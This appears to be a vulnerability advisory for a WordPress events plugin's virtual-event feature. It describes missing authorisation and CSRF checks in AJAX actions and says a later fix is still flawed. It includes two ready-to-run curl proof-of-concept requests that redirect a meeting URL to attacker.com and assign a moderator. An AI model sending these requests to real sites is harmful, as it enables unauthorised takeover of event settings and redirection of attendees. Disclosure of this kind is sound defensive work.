Description The plugins do not have authorisation and CSRF in some AJAX actions, allowing unauthenticated users to update virtual events settings, such as meeting URL, moderator, access details etc
To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:
curl -X POST --data "event_id=240&_vir_url=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings'
To set the subscriber with user ID 5 as moderator of the Virtual Event with ID 240:
curl -X POST --data "eid=240&_user_role=subscriber&_mod=5" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_mod_settings'
v4.5.8 of the premium plugin added capability and CRSF checks, however the nonce verification is flawed, still allowing the issue to be exploited via CSRF